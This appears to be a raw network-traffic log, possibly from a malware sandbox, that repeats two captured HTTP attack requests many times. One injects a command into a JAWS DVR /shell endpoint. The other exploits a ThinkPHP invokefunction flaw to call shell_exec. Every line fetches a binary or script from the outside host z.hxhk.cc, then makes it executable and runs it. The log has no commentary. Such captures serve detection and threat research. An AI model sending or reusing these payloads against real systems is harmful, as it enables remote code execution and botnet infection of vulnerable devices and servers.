Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
